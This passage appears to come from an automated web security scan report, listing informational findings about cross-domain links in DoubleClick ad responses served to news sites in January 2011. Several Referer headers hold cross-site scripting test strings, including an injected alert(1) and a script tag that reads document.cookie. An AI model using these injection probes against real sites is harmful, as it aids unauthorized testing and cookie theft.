D/url/http%3a%2f%2fwww.hp.com/united-states/tradein/promo/laserjet3/index.html%3Fmcc%3DGCJJ%26jumpid%3Dex_r2612_link/1Q11TIAS/1-ADGIO_mcc|GCJJ/dm%3A_N5823.152304.TRADEDESK_58826031_234985033_40268645"><img src="http://s0.2mdn.net/2309962/2-_Laserjet_TIAS_700_300x250_jpg.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.56. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Advertising.com/B3941858.17

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N5956.Advertising.com/B3941858.17;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161^778478^1183^0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=;ord=4382457826? HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6735
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:19:53 GMT
Expires: Sat, 29 Jan 2011 05:19:53 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Oct 21 21:18:44 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161^778478^1183^0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=http%3a%2f%2fcapellalearning.net/default.aspx%3Fv%3Dunilong"><img src="http://s0.2mdn.net/2450389/capella_program_listings_728x90.gif" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.57. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Advertising.com/B3941858.17

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adi/N5956.Advertising.com/B3941858.17;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000778478/cstr=67706747=_4d436c28,4382457826,766161%5E778478%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=;ord=4382457826? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sat, 29 Jan 2011 01:23:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6488

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri Jul 16 13:50:41 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
=0000778478/cstr=67706747=_4d436c28,4382457826,766161%5E778478%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=67706747/optn=64?trg=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D146143%26banv%3D3_728"><img src="http://s0.2mdn.net/2450389/capella_prebrand_cost_finance_v3_728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a>
...[SNIP]...

17.58. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000884204/cstr=40264137=_4d4372e7,8877258277,766159%5E884204%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=40264137/optn=64?trg=;ord=8877258277? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:52:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 556

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/b4/%2a/b;226750510;0-0;0;50154167;4307-300/250;39921274/39939061/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/clic
...[SNIP]...
4372e7,8877258277,766159%5E884204%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=40264137/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3Aaol"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.59. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.3;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000884204/cstr=98287644=_4d4373e1,2465371404,766159%5E884204%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=98287644/optn=64?trg=;ord=2465371404? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:56:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 569

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/b4/%2a/v;226750510;1-0;0;50154167;4307-300/250;39961082/39978869/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/clic
...[SNIP]...
4373e1,2465371404,766159%5E884204%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=98287644/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3Aaol"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_300x250_Free2011Score.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.60. http://ad.doubleclick.net/adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adj/N3175.272756.AOL-ADVERTISING2/B4640114.5;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000884206/cstr=49938577=_4d4373e0,5630318555,766161%5E884206%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=49938577/optn=64?trg=;ord=5630318555? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 01:56:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 554

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/b4/%2a/e;234024712;0-0;0;50154300;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://r1-ads.ace.advertising.com/click
...[SNIP]...
4373e0,5630318555,766161%5E884206%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=49938577/optn=64?trg=http%3a%2f%2fwww.truecredit.com/%3Fenurl%3Dtruecredit.com%26am%3D2063%26channel%3Dpaid%26cid%3Ddisplay%3Aaol"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.61. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.19

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/N3340.trfu/B4677841.19;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/;ord=1114973045? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 33346
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:37:16 GMT
Expires: Fri, 28 Jan 2011 16:37:16 GMT
Discarded: true

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
5voK/http://pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa&dcp=zmm.50658498.&dcc=39942793.226884546"><IMG SRC="http://s0.2mdn.net/1361550/PID_1507362_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

17.62. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4677841.19

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/N3340.trfu/B4677841.19;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/;ord=1114973045? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 14:48:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 33401

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
//pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546"><IMG SRC="http://s0.2mdn.net/1361550/PID_1507368_cashbackapr_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

17.63. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4938104.54

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 33314
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 28 Jan 2011 17:23:44 GMT
Expires: Fri, 28 Jan 2011 17:23:44 GMT
Discarded: true

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http://pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://www.nissanusa.com/rogue?dcp=omd.55865628.&dcc=39347977.232434380&dcn=1"><IMG SRC="http://s0.2mdn.net/1361549/PID_1464534_K1837_NMRO_CLS_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

17.64. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4938104.54

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 16:41:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37394

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
ttp://pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=rogue&dcp=omd.55865628.&dcc=39972439.232434380&dcn=1"><IMG SRC="http://s0.2mdn.net/1361549/PID_1517494_math_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

17.65. http://ad.doubleclick.net/adj/N3340.trfu/B5083632.138

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B5083632.138

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/N3340.trfu/B5083632.138;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/;ord=1186435577? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/js/thickbox.jsd2772'%3balert(1)//244e853bb28
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 16:41:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37765

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
PL9/http://pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=zmm.57350078.&dcc=40424790.233402132"><IMG SRC="http://s0.2mdn.net/1361550/PID_1522107_cashbackapr_728.jpg" width="728" height="90" BORDER=0 alt=""></A>
...[SNIP]...

17.66. http://ad.doubleclick.net/adj/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=300x250;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/;ord=1114886567? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 14:48:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 33610

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
=1033942;57634299;233688816;39823749&migRandom=6941413&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.vw.com/en.html?pageID=57634299&adID=233688816&cs:pro=vola&cs:e=cnn&cs:a:e=vw10jcjet"><IMG SRC="http://s0.2mdn.net/1033942/PID_1493947_vw_2011_compare_jet_300x250.jpg" width="300" height="250" BORDER=0 alt=""></A>
...[SNIP]...

17.67. http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4506.interclick.com/B5098486.2

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/N4506.interclick.com/B5098486.2;sz=300x250;click=http://a1.interclick.com/icaid/126728/tid/53a4b2a2-fe8d-4a50-a3d0-7a39914bbdd1/click.ic?;ord=634318151090380217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 431
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 01:54:47 GMT
Expires: Sat, 29 Jan 2011 01:54:47 GMT
Discarded: true

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/58/%2a/h;233972293;0-0;0;57757021;4307-300/250;39896058/39913845/1;;~sscs=%3fhttp://a1.interclick.com/icaid/126728/tid/53a4b2a2-fe8d-4a50-a3d0-7a39914bbdd1/click.ic?http%3a%2f%2fwww.uti.edu/Default.aspx%3Fadsource%3DID_IC_3x2_A_CT"><img src="http://s0.2mdn.net/viewad/3021956/UTI_Auto_Legacy_ATT_300x250.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.68. http://ad.doubleclick.net/adj/N4506.interclick.com/B5098486.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4506.interclick.com/B5098486.2

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/N4506.interclick.com/B5098486.2;sz=300x250;click=http://a1.interclick.com/icaid/126728/tid/53a4b2a2-fe8d-4a50-a3d0-7a39914bbdd1/click.ic?;ord=634318151090380217? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 17:37:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 432

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9d/c/58/%2a/j;233972293;2-0;0;57757021;4307-300/250;39896090/39913877/1;;~sscs=%3fhttp://a1.interclick.com/icaid/126728/tid/53a4b2a2-fe8d-4a50-a3d0-7a39914bbdd1/click.ic?http%3a%2f%2fwww.uti.edu/Default.aspx%3Fadsource%3DID_IC_3x2_A_CT"><img src="http://s0.2mdn.net/viewad/3021956/UTI_Auto_Legacy_LTRE_300x250.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.69. http://ad.doubleclick.net/adj/N4610.270478.AOLADVERTISINGADVER/B5087810.46

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4610.270478.AOLADVERTISINGADVER/B5087810.46

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/N4610.270478.AOLADVERTISINGADVER/B5087810.46;sz=300x250;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000952786/cstr=65504382=_4d434894,0873421211,766159%5E952786%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=65504382/optn=64?trg=;ord=0873421211? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:52:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 48441

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
e.advertising.com/click/site=0000766159/mnum=0000952786/cstr=65504382=_4d434894,0873421211,766159%5E952786%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=65504382/optn=64?trg=http://www.facebook.com/3musketeers"><IMG id="IMG_'+ variableName +'" SRC="http://s0.2mdn.net/1477621/PID_1502754_300x250.jpg" width="300" height="250" BORDER=0 alt=""/></A>
...[SNIP]...

17.70. http://ad.doubleclick.net/adj/N6103.135388.BIZO/B5185769.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6103.135388.BIZO/B5185769.6

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

